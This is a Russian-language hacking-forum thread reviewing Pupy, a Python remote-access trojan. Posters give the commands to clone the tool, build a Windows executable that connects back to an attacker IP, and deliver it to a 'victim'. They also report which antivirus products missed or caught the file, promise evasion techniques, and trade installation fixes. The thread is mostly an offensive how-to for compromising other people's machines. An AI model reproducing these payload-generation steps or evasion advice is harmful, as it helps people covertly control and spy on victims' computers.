![]() |
Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.
Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти. Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ... После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт. Я считаю что его можно отлично использовать для:
Создаем PAYLOAD Ну для начала скачаем все же и установим зависимости(я делаk на Kali Linux): Код: Код:
git clone https://github.com/n1nj4sec/pupy.git pupyДальше идем в папку pupy и там нас пока что интересуют только два файла: pupygen.py-сам билдер(генератор) так сказать иpupysh.pyсама серверная часть,консоль управления. Я попытаюсь кратко описать функционал,иначе статья будет очень длинная. Одна из фишек этой тулзы это транспорты и скриплеты которые позволяют выбирать тип шифрования трафика ,а скриплеты позволяют запустить какой то модуль сразу же при старте вредоноса(например кейлоггер) Посмотреть список скриплетов и транспортов можно командой Код: Код:
python pupygen.py -lCгенерировать бинарник под виндоус систему можно следующей командой: Код: Код:
./pupygen.py -f exe_x86 -o ~/DarkNode.exe connect --host 192.168.137.137:443После этого парим жертве(правда он скорее всего спалится антивирусом,но в следующих статья я научу его вас обходить,это ознакомительная часть) Дальше все очень похоже на метерпретер сессию метаслоита: Открываем сессию командой Код: Код:
session -i 1help list_modules run module_name -h Спасибо за внимания.C Вами былDarkNode) |
Зачет!
|
Инструмент периодически обновляется и является актуальным на сегодняшний день.
Пример компрометации для малоопытных пользователей: В качастве атакующей систем kali linux 2017.1 с адресом 192.168.43.162 В качасве атакуемой системы win7 x64 c АВ NOD32. Генерируем нагрузку: Код: Код:
./pupygen.py -f client -O windows -A x64 -o test_for_codeby.exe --randomize-hash connect --host 192.168.43.162:443Получаем файл (test_for_codeby.exe) с заданными параметрами: https://forum.antichat.xyz/attachmen...76e1dea8cd.png он находится в папке с pupy: https://forum.antichat.xyz/attachmen...f36a886504.png Доставляем файл на целевую систему, после чего из папку с pupy запускаем клиентскую часть: Код: Код:
./pupysh.pyПроверим файл NOD'ом c обновленными от 13.05.2017г. сигнатурами: https://forum.antichat.xyz/attachmen...55dd8a7eee.png Как видим, всё ОК. После запуска файла на целевой системе получаем сессию: https://forum.antichat.xyz/attachmen...26e3437d91.png Список команд: https://forum.antichat.xyz/attachmen...bda596afd4.png Наш процесс ID и разыв сессии: https://forum.antichat.xyz/attachmen...a8fd9ed36e.png Спасибо ~~DarkNode~~за обзор!!! [doublepost=1497343964,1497343770][/doublepost]П.С. Мой пост к тому, что благодаря шифрованию и SSL ни брандмауэр ни АВ наш файл не заблокировали. Минусом лично для меня является размер файла https://forum.antichat.xyz/attachmen...8e08ed7f7e.png [doublepost=1497347490][/doublepost]Еще добавлю. В отличие от meterpreter, при разрыве сессии отсутствует необходимость повторной эксплуатации цели (в случае с pupy это повторный запуск вредоносного файла на целевой машине). Т.е. если процесс не был завершен, то достаточно повторно запустить листенер. |
Avast детектировал файл test_for_codeby.exe как вирус!
|
Только что сгенерировал с отличными от первого файла параметрами, NOD молчит (тест в virtualbox)
https://forum.antichat.xyz/attachmen...2710a77cf6.png Вчера тестировал на реальной машине - тоже тишина На VT не хочу загонять. |
С отключенным антивирем прекрасно работает
|
сам пользуюсь этой утилитой( как пост эксплуатацией) ..впечатления хорошее, но палится некоторыми антивирусами.
|
на днях сгенерированный файл был спален на целевой системе стандартным виндовым АВ.
|
Цитата:
|
Опять ошибки при установке. Как же они за..Ладно.
При установке m2crypto возникала ошибка, поэтому пришлось:
Ещё не мог установить из-за того, что нужен python-dev. Решилось так:
[Добавка от 13.12.2017: 16 - 03 МСК] "Template not found (/home/server/Загрузки/Прочее/pupy/pupy/payload_templates/pupyx86.exe)" Решение:
Решение #1:
|
| Время: 19:25 |